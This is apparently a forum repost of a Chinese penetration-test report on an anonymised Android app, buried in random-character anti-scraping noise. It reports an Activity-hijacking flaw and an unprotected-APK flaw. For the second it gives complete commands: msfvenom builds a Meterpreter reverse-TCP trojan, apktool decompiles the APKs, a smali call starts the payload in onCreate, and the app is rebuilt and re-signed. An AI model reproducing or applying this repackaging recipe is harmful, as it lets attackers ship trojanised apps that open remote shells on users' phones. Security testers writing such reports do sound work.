原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

admin · 发表于 2022-6-8 20:32:44

4 k( [ Q( x' R! R" X. {+ T 0 i: X0 v- E8 a' {: v1 W% a' L
4 I) p/ t7 J5 o% [* U4 K3 c3 t% B. I9 ] & t( K8 O8 K. l2 ]

! q4 e5 s5 E) L % }$ j) v8 ^4 n1 }' P6 { 文档编号： $ ~ G5 w$ ]$ N% o! D$ s3 V+ b" [0 ?! j: O" C

' O, j5 W/ j( p& t # r# V3 D+ l, V. k% Z8 Z$ @; ? O 0 X, A. J% a# i4 V0 Q5 Y" p# i- r! Z2 R8 R; ~: A9 K! z; c$ \4 D

1 V+ }. O% V" c$ U/ e 0 P7 s i- I" w- l. ] 6 U8 R' M5 Q) C$ E 7 l; `4 n, F: j

' s4 l, ~9 E' ^0 {+ m% a * Q% t& Y8 \7 j8 i8 T : g4 f& d$ l; b" Z* t" U* b' {4 p; u/ n) \

+ j2 S* w2 f- ^% }$ P u; Q# P ( }- P' W. B" M" C- { @% J: Z" G0 C & k. Q8 T( s# I2 }! K

% P* T3 E) b0 }6 Y7 B( I' K% N# J" g; W% t- P9 B+ l / E2 ]+ e# n9 j- D8 ] 7 i# a1 |6 }3 v& z2 F# U

. [8 A, v- a& {& D, _. M! s 4 k9 a% L" g! \2 O 某某某APP渗透测试 * [+ O9 Q0 e* X6 W0 ] f* J ; D3 h: `6 o3 r+ Q; G! \

6 y7 u8 _7 ]% \& v * c0 u, }, E0 P' q, T' u , r* ~! S7 R! O5 L# U6 I7 O 5 A) ~: Q( Y# ` o% v- h: D8 i. f

) Q. p. _. V% M; |3 N4 F3 } 2 ^2 Y$ i) Q S : A0 j/ J3 S |1 o2 {& |# j" @ - ~! U1 u1 X& w' x- y$ \4 H" @/ q

5 X; ~) i) a& Y- g, O: @ 1 ~+ m4 {+ |, y+ V % b& p! u1 d& q/ F) h: U* L6 X, h$ J) K5 p& ]5 G

0 P4 H4 f% i0 m/ W7 g% P$ V2 k 6 T# q8 _# r' O0 O I% o% g; u% j & I/ m; E: A5 u) A) o" e: j1 M # V, `8 ~, Z! y6 f o, b, ]' j

& H1 V( @/ Z, r- v$ T$ \ 7 p3 J/ l" {( V% | 技术报告 . T+ P( ]6 E [+ m3 j; q- { ( W3 J& x% r$ |* }. x, N# d

! H1 G f" |( ]! n8 {: u* s I 5 @% D) M6 f( p5 q % _! t$ p- d' M" V* n i) X+ @ 9 L. T f' W* a3 ~

9 E7 z" A) i1 M& r" j; P) @+ R1 d J0 ^, h6 l2 n3 A O) O( W0 g; p ( j- r ^+ K" g6 ^9 Y) F

+ b+ g& S `- n9 Z ' s0 |$ |% W, E# C+ K% ~ - T+ H6 }0 A7 z2 I, b. i9 e+ h- l. F/ e q! ^4 K( o5 R

6 X) ]! G1 W5 k. n. Y9 T; |; u . W5 w5 A S# a7 W6 h* E b; V ( Z* |% i" g- d4 q% E$ h # q3 m: @4 n2 F, @ c h1 h$ T+ D9 j

3 \% J/ @0 c, C! S# | . T, h6 o, x4 ~+ C0 x 5 a8 I' [* Q. y% v P ' l3 e& f+ H0 F/ h3 W2 m( ]

9 t6 t. T8 O) {8 O$ f; E! F6 }( _* f / o$ ^ V/ z, ^2 c) Q0 t " r# |2 h4 t& h/ [

: j( ?* s- p0 u. G2 u3 x5 f& M+ _. k0 l' P% x & b" i q; F8 Z; I, u. i4 J 1 G8 B) K1 F8 {: W

: i1 a d7 i: D/ L5 s5 C/ s# e% t1 b" q - @" F7 r! t8 X [3 A 6 s5 C _( j$ k/ b

! b! x; |, V* s' E' f8 D, k, ~ % x& ^$ ^- Y7 {8 T! u' t7 Z3 ` , p* b. G* u3 P; D 0 _1 a7 S0 @0 _2 A7 q

$ P4 n( P& E/ Z0 `' ] " `1 I& L/ g$ m7 @, P% Z. H2 s 6 y* c* V. z: H' d. E+ D! o1 ^3 K# k9 H& S

; W1 G* }& i4 F _" ~* t * s& S" z# g' B8 C9 C" z) F , E4 M8 m' E- n 1 E% T0 _5 k/ g: t. k

# E8 Q. L# y) { 9 l1 f! ?* |3 A" { 0 q: h2 A3 l2 O8 }+ L3 I! T8 m& B ) F# t6 l$ u h6 c( S5 |( G

/ q+ W9 ^- @" }# ^/ w1 p( Y) h- D9 e$ ?5 h" c" f a% M% u% w) D; m- k4 D , s- ^ J; s, ^/ o& I2 R( h* [

2 X$ r, m- e' r" K- g( k) j5 h0 d# w9 @8 H! c/ e: Z ) u. }; T! y, i5 t; k5 ]7 H 2 z& G8 R% R5 `2 T2 q! x

% Y/ ?5 M% Z6 v U' p, I 8 \0 S% N- W) ^ v# S E" @. D3 z% p) w/ y4 j' C z ) f' t2 x0 U' x

! r' J5 |6 O3 ^5 U/ Z ! N& m* u) s( ], P' S$ A 9 U/ H5 O1 \8 G* |+ W$ B" f' W9 i . S! d! _. v: u

/ l! H9 k, a: W. k $ ~8 n" @* U- B2 n$ o 4 J& C: m" u6 d9 a 1 `/ ]+ w7 v7 q2 O; V

4 ]7 L! y4 k3 z* U! U% R M0 m) B- Y0 B: Q# a9 T r7 h* A9 t ; }9 j! C+ r: {+ I/ H& j9 |; V5 W 4 E( h) U' a+ i9 A6 R

# Z* g q" Z6 S' s; s4 b/ J% V- [+ i" {- b; A3 M: X; Z 二〇二〇年 # I m, i- I5 p, |1 C. N2 s+ c & X) }: k% W9 \$ x

; a- }6 o) c6 ]! C0 k7 }$ n / D) U, m2 C4 ~ 目录 $ u! d! @. \, q7 x7 m/ B5 L C: E# u6 j8 _2 B. ^+ w l3 I

7 {5 g( b' L) [# O( d _3 o* m+ p9 S6 \7 m, c3 H6 ^ 6 q3 |, }6 a( a+ U$ [0 Y1 n / M! l+ H( b$ u' a5 ^

4 |3 J. n8 d" L " V, W; W" y+ W) [; S& i 1 概述... 3 ' r. x1 i- L: s* Y& K# q) C. q0 m9 c- p/ [4 k: z

$ r, F7 R& z! z- {" ^9 D8 f& j' ?+ L, ~7 H* b4 n& C 1.2测试时间... 3 $ d8 e# Z$ H( i 9 B! }+ j% Q0 P2 V' _. G

: O/ C" c4 X m! t6 I# Y $ n6 l1 x. _7 E9 p- f2 V 1.3测试对象... 3 ) Y" a! w! n0 q7 ?! o ( O6 p/ ?/ V+ y8 J- W

' p4 A" |5 Y. a+ @/ O& f% U+ r 3 B$ i! j! j( U0 U& i: l" h 1.4测试结果... 3 5 Q/ O1 _( l2 w% y5 u& o9 O / A4 U# b$ V1 v* S5 S

. Y, K2 F1 r0 A6 ]' p4 r! ?2 Q( U % w" X/ h& J5 C. m9 g6 C 2 检测结果... 4 1 D" T7 v" X% N- g 7 G! T( D" G# \3 K: k k" h3 X8 g" p' E

* v4 V1 S& w, Y& ^& [& P% W : b& H3 d- ?4 e6 V; ^. C7 J* V% L 2.1 某某某... 4 " m2 L( b& v$ H5 \5 `+ O9 y 8 {0 K+ }' n) ~2 [, E. c

/ d% d1 @. t4 ^, |' e6 Q8 p* i3 D4 K# f+ f 2.1.1检测目标... 4 / ~9 |1 R0 c+ P& ~* n0 R ! z2 A) J' \/ F$ L

1 N- Y# r3 }8 R( M# X* ^+ p # u1 m( |' _) \7 G$ ] 2.1.2检测结果... 4 ' N/ e) S, a; o' J1 m& L9 W- t6 R. e6 Q9 }4 x/ u t; Y$ v& o1 T8 l4 u% |

+ ]; @$ q3 N- _- ?4 Y1 G # F% O/ T4 {& I 2.1.2.1. 4 : s7 o% X+ a4 E/ c * D$ u! b; r+ i% u

, b# L8 U: {: X7 V4 _+ j& [4 T3 h. s S6 [1 d! j* `+ }5 g; u3 _ 2.1.2.2. 6 0 x, d% i( k n+ T* [. z 8 a; Y* c6 ~. l0 k) U6 q: y2 }

1 ^5 z# ]4 T* Z3 C5 u) x. k& h! R: h; w7 w& V- w( k: u( f. u# C 9 W2 D3 u3 b; O0 P. H4 C 2 @8 d2 T0 z3 M2 Z

* p V8 K4 O T7 O. D" J7 X+ U, X$ M4 T! N# V* B$ i# l, c 1 概述 / a4 T, w* L* Z m 4 _9 C, g. b# P+ y; K7 W& W

% A. h5 n0 N" U+ v% W- |6 E6 E, d, ], u) X 1.2测试时间 + S% E# X) T' w- Q" U8 i 9 i% ?% k1 `9 s# Q a, ?" V

) r3 y6 F& q! }: B/ a8 b ' H% S5 C" ]" B+ e+ V {7 h ; f0 Z* Y* F7 [3 N$ B 3 l. X: E% p/ k 渗透测试时间 ) y* h/ j3 Q% [, b , ^7 k. [! a- m- t% [& j9 N& J , N3 E8 I* s1 S5 A) h. o/ F' b6 Y8 x
" F# s% B4 k9 C9 x r9 s1 D% x' Q . X* a" ?* w5 A 5 N8 P; Z: }( i+ [% @+ B+ O( M' v H % j4 r) n7 o8 p5 w4 x! R+ V: p 起始时间 0 V2 v0 ~- u6 {# m( V. a) I . g/ D( C3 s& l# Q $ V) e# _1 {, b n 3 P6 }$ }( v6 X/ z* b) I	) G! V1 B5 U& L2 b, V+ B w & D q5 q9 f8 ~& j: M % t0 Y: N2 ^' c1 ? & _) P; k: T8 B 2020年4月6日 ; c4 I' x: ?- h4 X \# y/ r6 m6 g+ v+ S6 C+ J2 L ; M# \| W( h2 {" Z5 o) m2 ^5 P- ~/ L % N9 ~' n( d8 X1 ~& x! X
+ O+ N9 \0 z2 Q; n5 _+ H4 W2 E( Q1 v5 j; K * H" h5 `& X" g4 x' J3 F! B/ P. m+ o$ \0 l1 ] 结束时间 & ~1 V: u9 z" l- ?! H 8 p7 U- b8 p; ]5 W- i 0 h; H3 \|& P+ O# G5 \|9 }7 Y& Z& m5 v# K	6 K' Z4 G2 D- h) O( V4 ]8 I; _ c$ k3 {' F/ ?( l5 o$ Y/ v6 B : K+ o; H2 S+ w5 x * k- T1 a8 w' b6 G 2020年4月9日 5 q( H1 Z) b9 X0 x- ` ; Z1 w2 f( d) t" Z% [- v 0 W% p9 q1 k/ d7 r/ n5 o+ D0 h0 k2 n, ]3 B& x- j. n' Q% A

& l0 }0 N7 }, Y* [ ' u7 ?& U# Z4 Z7 o 1.3测试对象 ; D2 p! x1 |2 j, A8 w 0 @6 d T5 |' t7 A) U1 X

$ M5 c9 `6 G& u' p& ]7 @) h4 z% W1 x" I8 U! w 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： * V l' z4 Z/ N# k / E, ?- G! A: f) [

8 x/ A* I! u0 q5 } 0 s5 g Z! k9 ?' ~, N# B$ d) F 表1-1 检测对象 ! a/ s ]. L* c7 b' `0 y, M* }' L4 d& s! r. S; x

5 s9 J6 i; H g# D2 \|6 L) ]* F! z) _3 t 2 D! [ X! ?' t4 }# ^+ m 3 e' ]+ m# O6 A. @6 [8 U/ q 序号 + J6 J% g, J) C. N4 c * {, T2 n& o6 O5 \$ V T ) u8 L4 K t/ o8 `$ ?+ M 9 [6 t' X% I0 z+ K- R$ K	x, k. V# U3 K* m" J ' ?; d0 X# P i 7 R+ r r, }: P7 `5 O ' P8 {" [: e6 V 测试对象 8 u4 G3 t% q2 C9 f) ~9 n5 H% i' C% {) d4 j+ Z% ] * @6 B$ { M1 E q " B/ z. F7 l" u9 W3 r. Z* z4 B! }	o0 Y, q6 b3 l) q" i 5 T) z) H% c7 f2 \| ) t, h2 f# k6 f( ` ( S) n6 c, {' B4 ` 测试地址 : l5 N) f8 h3 e2 O, e2 h7 Y 0 m. o3 {9 c( l3 w E# l ! y% E0 u( n- A9 m- U+ `* ?7 }4 K( Y- B* E- a4 r	7 g. M9 J8 ?- p. C8 k# C/ [$ r0 }8 H1 }" j; }6 W5 g6 ~6 D 9 N: k: h0 e& X; l3 s9 O4 _ ( t4 u( y, v B 安全漏洞 ' T1 E/ l n; v; {3 g & Q; C7 a8 N9 w, F6 E, F 3 W! j, F. ]0 q& b- `, { 8 e: u( Q4 W) f+ v
$ l/ l7 N% ]# @3 ^. u3 b( \|- y5 n$ \$ Q9 R# y, w ) C6 w3 K; x, L0 d" L - {' b# U2 T" P' i2 t2 x 1 & ]! D+ l5 e0 f+ y- J * t' I( \" F' M- H4 J : j) I8 h9 W- n 0 z c, d. t# S	+ l; \$ E% f7 k8 B- t; R. V % D. r: C- R* ^ ) {) J1 I/ C( _# W/ e& N4 f2 \|2 _* Y( e 某某某安卓APP ( \ U7 Q; l/ ^* X8 L) P7 A 8 k: v" P; x. P( D/ E) v 7 X- }9 p+ R. b( U) W3 z) l1 S7 d0 V 9 K8 G$ [) W; T/ t$ O	; i- B: R" n. m( l% B6 T 4 ~& w0 B; M# N; [ # d, s& \|; ?. N- U: P( G. C7 N, I7 x6 H; E" T7 z5 v 3 n* Z6 [4 m. {% w' ~! @, H9 ^; M# C+ ?- L4 _3 l: m% J6 U 4 o0 s' o" K8 i! F" g3 h: V 1 ^/ b1 D$ }5 R- t; o3 c- m	. k3 C) z+ L5 [; W % @$ m: i9 d, ^2 T& e $ c" ]+ Y! ^, x& I" C& ?, ~0 _# r% F 7 I9 B% `3 O) L 2 0 F8 ]. K! }6 {$ N* ?+ A5 C0 ~# T4 H4 M7 S F& l # @3 `& w6 T. T" {& Z6 ` q ' M. m, m3 r, d( p

. n" o" q: o) `% | . B, n% Z) _6 o# k$ t9 c0 D 1.4测试结果 # e6 L' T1 [# p" G ^& }/ X' b' @6 v

: i! i) t3 r: u1 P- A1 l p: ~6 r1 O9 e6 X3 i' Z t$ l) F* F 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： 1 l; B. o" @ q. w5 z: i) r# A& ~+ t' \* d* M1 \

1 V% I4 i% X) M1 { ! l4 E4 A, w1 h% U* } L* z! {$ ]9 A- F7 q0 T [6 c; D; Q) F' ?* F& I

& _$ ?$ H' \! K3 R# N9 [ 5 E2 g8 y% _' \ 序号 - J( ?. k7 V" Q8 D5 Z & \/ [$ I- [1 R4 |: o, m: r

; L# v; N0 \5 F: p , q# \6 l" r1 {7 O: F$ { 系统名称 # q9 \# d P) i# ?4 U- Q/ j# w - u" l* A. f& }* Z; ]- W& `

- K% D) r. v+ _% m$ h: j; R ) ^$ l( U0 M9 C( n! R, ~: r 漏洞名称 ( V: d$ Z; |: d7 J' t " {0 X( s% w: Q

' L9 m0 R4 k6 R4 t% Y' j" m * u9 C# h2 G3 u* j: A- s0 ^5 _0 `, | 漏洞危害 7 o2 W. b$ Q8 t5 F1 k 5 z. j' f* V" S2 N& F- I; ~

J9 o4 J; _, V# \, u0 v3 f; ^4 a7 e* H' u: d2 G- j t; p 修复结果 & K5 h0 W$ [0 ^8 v# Q; \ % b8 E9 V) A; ^# |# d7 d) I

/ h# U( i$ G- p/ _) v# { , J- j+ e5 M4 N1 e7 n: t% X6 _0 Y 1 0 u/ H: Y8 y6 ]3 A% k * G4 Y4 ^. C' g, h

) @* `, L; F, T# {1 S! S " W( G! ^6 G6 S1 P8 A2 V* C 某某某某某某APP . B( v: {; p3 T# X* [) s$ o ! Z7 o q( w* D# K

; T+ S+ B) |& o# j; } / [& v3 y# I5 X, [8 w Activity 劫持 & u8 h) U) S u9 c9 J3 p4 ^5 U9 V, \& S) K9 g

- |6 S. l8 l P$ d) _: l' X : E5 t8 F1 t" t6 R2 H & L. |# U' j n" t9 o3 B# s n) r0 P% |. H5 H, D+ P

0 r0 K) N# N, d0 \( [% p c/ P ( ]- t. o" C) k 高 1 A3 v3 `, [; i. f+ d, B ( r4 Y% g6 ^4 e1 u& m; a# A5 F7 P

/ D; M* Q( A f$ _" A9 q m3 w$ A : F. Y/ _0 Q. d, @ : B1 o& ~1 g' ^- L9 u! H ' V: i! a) e; C' ^8 [- m

8 O( U) k+ j0 q- v q" _$ _! W0 b# P6 k6 d) b- u+ D& `% x 2 8 x% L3 i% F: @' T, Z) i1 H4 D4 m; K: K7 l) S& S

' K! f6 |7 Z3 O3 j6 y2 K3 P! p 6 J7 h: D2 I; o: { 某某某某某某APP # ]% }* o5 B: h5 V$ _$ j3 B/ I, z) F, N2 B/ X4 y# H! d/ ^

5 @7 N3 ^ m3 H. m9 l7 ] 8 v8 p/ |3 m# }0 V+ q: A 反编译二次打包捆绑木马、篡改APP代码 4 U3 V, C& k4 v/ m$ Y7 `$ P6 M+ n8 V( j) q6 u( Y( W

- D6 q0 X$ @8 C& `2 }2 A ( ?& Y c5 _+ W8 c6 ~& ~ 高 / I" h- [ K) T8 D" X% w , \+ `; \; |5 ] _8 q9 U" A

2 A; y% d. `: B& B ) y+ W2 o- v/ g2 u+ f , d& ?; y/ h8 p* b4 m m # g" c( ]& `7 ~

) F$ y. `3 C5 M& F1 x+ r ( B; ]+ p( P; d, N H0 @2 L " L* \- k; x- b. Y1 B$ \, _. `( V4 O+ F% x, E8 i- A; ` A

: J/ S( I6 m; I/ X, {5 [ , `! w1 H' H5 p, _% @8 I* t 表1-2 测试结果 4 N: f% c- g/ p+ R/ N 2 [; q$ A% t, u }; Y

7 n$ T& } a1 M 3 ]' p' D c2 G; `9 h / x2 U; d6 u5 D( B8 q 8 {8 `; Z. j0 Q0 F9 P. W4 M& E

- q% p, i7 n, l0 _' p& n8 K1 p0 A' N/ r/ b8 `) N 2 检测结果 5 G' ]' c @0 {% v. J, X' @& }) }5 d0 y& B

5 S- u2 D% y! C# {/ C. H * ^& Z0 ^2 F; h1 M( ^6 j! g 2.1 某某某 " d/ e1 _5 k8 R i) { ! }9 [2 b, P4 k

3 D, m% S+ M" b; M . h6 v4 D, I& A/ h \7 u) D 2.1.1检测目标 % C; r" _' U$ l+ Z9 U) d! w ( `; M5 Y6 e2 H& V

8 a6 m$ E4 R2 \ - g' u' u# x. E/ H 目标地址： 某某某某某某APP " a+ |% r2 ~. W' y( _% h; Y( i- @- G

$ `8 x( ^5 `+ u& Y8 _" R 6 H+ P1 Z; u2 O+ t# [2 j* M3 X 2.1.2检测结果 ; u% `: G' P' O1 R( c ) ~# U* b7 T6 C1 q, H

: l5 [2 `& W2 f3 o/ r' U6 l1 o- K( n# g0 y1 o, ?/ J" ~( e 2.1.2.1 , H) p% T2 ?# Z6 Y7 ]! ]$ f 8 ?$ e$ t9 J$ y9 y

3 ]: @! E$ |9 W 0 c9 `/ k0 W: E" N) w! R 漏洞链接地址：某某某某某某APP " d; [7 j4 C# H; [3 @ $ h8 I5 U* ^: C6 Y

' O: l6 w- o, \! K4 R- O4 A6 z ) \3 ~* t- a: s% X+ Z! v# ?* `. F+ i7 Z 0 I4 o/ x# n9 F: \- n ( c+ S' v1 [3 E$ K

3 @4 \: Y( r: L+ y8 V" @/ n+ X+ s0 _; }) O; J! J 漏洞分析及取证： 2 k9 ~0 M4 ~# }; z+ e) L / H F5 E0 J9 k0 s) b6 X, k# E, K1 y; T

, o$ v5 y( I" k. U0 a ! @6 L+ U& R8 M! i9 s 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： ( @# s$ I! P( Q/ k & X3 r: K% y& e" K: |: E

4 f5 e7 x5 C( J$ u9 q( C6 _% I/ e9 q: l" }; T 3 T3 J1 z/ Z$ w+ F O( q# n6 h# e: g% t( t1 u- E: g( T: K

$ Y/ M" F7 y2 n' @; Z - h+ }. _% }; v( e) y/ ? d6 ^/ ?: p; Y+ l ' Y: o9 F% N' i/ g

, G9 x2 p8 U# _0 q0 ]5 [ 2 w4 _/ m5 ]" g+ ]$ |7 W. d , S$ a* W* k; E$ s/ i( e H $ p/ r8 l9 _% Q- }

( i' R; V& V. ^$ s$ t 1 h' x4 J5 {5 t9 D 0 ?. U* y9 P% U$ e& I) o 0 A# f8 e# `. @- b

" Q! g$ [ c0 X2 c 8 K3 k! d3 V0 _* E/ V8 ` 1 y6 H1 N+ V) Q A& ` 6 Y( _# D% w2 c& P9 A( h6 r! s

" o/ e* R* R1 U b; P 4 t* S5 p+ s/ |& I9 K# r% x 漏洞危害：高 * v% c# J( e2 e7 F) B! G$ q" M' v 3 e5 G3 b- D" r' c6 k) R8 N- M* b

3 f }* S1 t6 @- C5 G - B/ T4 f/ q" {3 E7 w 6 V3 ^' q ? Z# b. t3 \! c% o: M9 a1 G/ U9 \|, C( v 严重程度 7 m Y4 D8 ?6 \|1 I8 i# y% X" _- R8 u* R* h5 o6 X5 v. f/ ~* a$ Y! V 6 G% ~$ G7 J2 l# Y0 O( v$ J& B& j; f0 B	; U# g6 [; ?% ?9 P( F+ S( O: f. M) a ( _- _9 a, ` n3 t$ z7 T0 {% [ ; q# k" P/ T) g( n" u# e 高 0 j# k6 V2 x5 m( I$ c% l: c4 r( G6 A# M9 c& T5 Y- [ ! r5 d7 s) X, k+ s ! q5 e$ w4 r- g+ R1 j; r7 A	( v$ e) H) ^# t5 M4 Z( I6 [0 j. k ' i I% s* S6 i& d" I6 m1 r5 v 1 v! o& Q9 t* o R0 c & V/ c' Z& {2 A ■ 1 H! B5 [3 {- v6 g& p 7 D7 _4 {' o" R . A" d: ^! G& F 0 S2 G! Q$ F3 u% a2 c: a	9 p. b x6 c" S; y d; z3 y & J( I, g: W. `, v$ R* f- O4 E & A8 E8 e& F- C0 w( t& D/ w % w: T6 r/ ?2 @$ F; R4 t; C 中 ( X' b8 w1 R' x7 _' ]1 f9 X8 n & b5 l' E S' D % x- k9 [0 Z# ^2 _- D7 R+ a $ k6 r7 Q2 m/ T! ^; a3 V- d	! s; r8 o/ U: m( c0 s 7 { q5 r& v0 o4 x" J: V' P # ^1 h% T8 W- r# O2 S. I* C$ b4 q8 B 3 [* R6 n' v2 y) i2 n3 B. c; V ( D6 R i6 x$ o+ x8 V . N0 f! r" H# V- _ - @! Y: N* K5 T' D1 O	) y' p' p1 a8 D' W' j( g3 ?* o) E! z( E # y! e# p. A0 F9 x, { - {3 B: f d% \|) \|0 q 低 # `# g* Z4 A+ J2 e5 W5 o* u ~ ; i# g, y7 [" Z5 K/ k' ]- J$ M+ \ 2 X/ {. `* A8 R1 L 2 P' ^8 e5 ` _! u" B6 n: @6 ]2 y- _	6 u9 B' @- W8 s' R% K7 p" _& ^0 H9 u& A {& D 2 h, T! Z* W" j( V, g $ ?4 Y8 V% d* @ / ]6 t6 z8 l+ U5 K" \|5 v8 C0 t0 P : h" ~/ e& @9 U% Y3 @; l3 B* H. R2 Z " h, Z7 j5 J' z. A! f$ H" [$ _ 6 }6 n8 F- A Y3 K; v

U& y6 i+ x G: _7 j+ l: d9 d ! p$ |/ w' P# J+ O/ R+ v! C( s 6 W3 ]4 b- W- _0 r5 j: q: e6 U5 S( V! h- q

3 s+ V9 r5 _8 x4 d, ` K u 5 S' M: D- z% z: A; U* g 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 & F- o7 j' @3 q 5 F' e- u; }4 K- P5 J1 F

3 ^+ p7 ^0 s$ z, ^: T3 r 0 C4 z7 V! l! ~6 S! ? ' n( o k3 x8 L* ? 9 q5 Y5 P q7 b* ^! g+ ~8 z

) I- X$ m! ^2 ~- P. P2 @ & _8 ~: N" \$ g: a4 H : S$ \, x% A/ g1 w8 @/ x" M ~# P9 F9 ~! v5 R1 d" J

7 B2 ]4 i2 l' N3 K* e3 u8 F# x! h4 l2 T 2.1.2.2 ) E7 e. V5 U2 a2 g 5 Y! O/ T. d' C" q/ l5 w" v/ O- {

# u$ R4 b4 s* P5 ^ 1 C: |' a. P8 [( c: v 漏洞链接地址：某某某某某某APP 3 |" T. X/ @- M' _3 {+ o 7 x# ~; Q8 T! N. b1 E$ f& I$ e3 H

& j v. g, o# H f 4 x2 k7 @# m7 U: ?& j 漏洞分析及取证： . |) C k; `0 Z1 E& v y8 o0 W ! ~( w& D* u' Q8 F) h) f& S

& B/ ?* S4 d; E5 J: w* J( B" ]7 X( [4 I# P/ G) ^4 a# I [ 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： 6 V) y( l" P$ B2 v! N+ }0 |! G; i2 m* ]4 l; `3 n6 D# {, O

9 G# c! l! }2 G. s9 J 7 B1 x6 q, M; K 用Metasploit 生成木马 apk ' }1 I8 x: J. T6 ?! _, ? 7 M5 A) v. Q. l# a2 D, v5 `2 y

8 c% e9 N: n3 U# M2 M * m' B) T8 N, Y6 g# [5 q/ P5 e msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk ; }) }9 c# N- L$ R; Y4 }6 I. C' h/ B" A" D4 R2 v8 Z4 o

9 ^( N/ |, o. h8 N: O; z" v- x- z7 {6 n 8 {- J" l; \1 j; L' u, l 反编译目标apk和木马apk ) A; L# O4 q2 [, b- g4 E 8 _! a- J) ?% |% I5 t/ g8 M

5 F( S& S- K; }6 p n/ s3 R% K0 F7 L apktool d target.apk
- C& d9 y( A4 q9 ? # V3 c6 l6 s( G( o apktool d cockhorse.apk 6 l ^) r) ?5 Y* B8 }! w* z7 y# y* j9 A5 c4 g

* e* Z4 n' U7 J4 _/ X& z * [5 k5 p" N$ a% p9 k# C! u 木马 apk 注入目标 apk 3 Q! U- v5 Q- q3 v Z! @ : p. H# A1 y& I/ h% } P8 z0 T

' l) R- A6 F0 V! n% { $ F3 ]+ F" z2 ~ I6 t# u 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
/ Y9 p) i7 h* k4 `; o5 f ! {; C2 \! {0 n& M0 a2 V invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V # x' \3 g3 W/ H0 p5 B H W0 G) z: g8 P- }- L

* f" M" \1 ~9 ] W8 C6 ?3 P0 C % r9 `/ K. F- {7 t 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 2 E( W" z; N" F, V! H: ]2 M 3 j7 e1 u0 [ V% W$ B

$ p- L9 |5 x! D" I. `, a" c5 \4 s! V 7 l5 q6 @# K$ W" Z" A2 h9 @! r! z; p 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 8 s' v( O; C5 V8 p( Y8 m. C % v4 Q% l9 a% e# a

8 V& d7 r" p4 }' s1 s4 f* t6 X0 M: [( Z! a8 B. D5 n$ T 回编译生成最终 apk : n, |9 ?$ S( \ * k: n3 t( D4 X# h2 s

. ^1 i2 e) T+ ]: F* S2 `1 {+ \4 k' _ Y/ S4 Y7 X. ?6 Z 重新打包 6 E2 i9 F8 s& p! ] % Q3 J; c: j% x

, n2 S( y5 ~% V1 V. u1 y4 M$ ]$ ?4 C3 g# f; d- v; U1 W apktool b -o repackage.apk target_app_floder ( S, A, q: g' v D" L; o8 \! U/ F8 [( c+ N" Y# W; d

C) d% w. G9 H: D- A4 Q . i1 `* ^- i, ~ 创建签名文件，有的话可忽略此步骤 ' _ ^4 S- x1 S" m 2 _7 ]- o3 K0 y

) u+ f8 E( _* ~1 u: U8 j) M' @ X. y keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 # `1 n/ Y( [, F/ A / `6 O; H* \2 V6 l- h) A% g( L

3 X! E) q B2 w6 N3 J2 H, n# U 3 C" E0 ?9 @ L& S% f) A 签名，以下任选其一 b; p- y( Q3 o# T8 P6 ` : o; i G6 J$ A; |

% Z5 g2 X2 J7 S# ~' p2 W& X$ @- H& w5 ]/ _6 X9 h3 X4 c6 K jarsigner 方式 * W9 U2 }2 L+ w 3 @* ^% i# I; ?, J

% t- W3 y$ I: ]) G* Y8 A8 P/ M " d8 K; q, ^. H jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 8 T, S3 ]/ d0 \* s. R 3 u3 Z9 I2 Q/ v, K1 o# F$ j2 ?, K1 S

) |, `% t3 i! C. s" f, ?2 q) T0 ~ apksigner 方式 ! p7 B- B/ ~4 y " p n% n9 ^" U" P8 }9 T

" T- a( @# E# t& ]8 a* R$ L + p1 V% J! ~! j3 O apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 7 q! h& M! H! H ( T2 g1 M m7 G5 Q

4 R$ u- K3 O( P' Z2 _ 7 U, X0 Y$ z5 B' q, H. b% | f* S 如需要禁用 v2签名 添加选项--v2-signing-enabled false / M' [! b% I% s: T% w7 e7 y # G+ y9 W/ |) @/ K, |3 j

! H+ O7 ^) P+ M1 u6 C 9 I, F1 v# O' P' P. V: n 验证，以下任选其一 8 R' h9 Q" _& ]) j0 _! | " p. V$ ]9 d, [2 V

: z- P6 E* X& t2 N/ |6 c + i, a4 _5 {! `$ F jarsigner方式 6 d7 H/ A! K# |% b 7 ^- m% U+ B* P0 b

, }# V9 W& R# ^9 h2 { * r- A) z( ]9 Z$ W: i! y& Y& r jarsigner -verify repackaged.apk : O, [4 W9 D: j+ d7 z E# ?9 ^9 s- Z- O7 j

( \' \1 A# z: y% X" n* V " |; v& v {5 l7 u7 k* l" J apksigner 方式 ! r- d/ E* t# {4 { ( Y: u9 m8 [, s2 a: G& S

6 i) y3 S5 k% U0 w8 h* C! C8 t, O" u; U3 ~, [ apksigner verify -v --print-certs repackaged.apk 2 B4 v) B' }7 ^: e8 j6 P# r ' B% Y! o: j+ i; x0 y

$ A" g$ }1 z% m, G+ [9 n 2 g1 K' j9 J. E: Z keytool方式 / ^0 h0 {; n" Q1 M5 v 9 z4 S, ^9 ]' N

; `6 u, M# n8 S( G- D8 f) p ) ?: D0 r5 {2 y) E, A9 k9 w4 e keytool -printcert -jarfile repackaged.apk 0 I0 \& l; E3 I% C4 @) @: \ 4 q( O3 p- z$ y" d& j, i6 t5 T

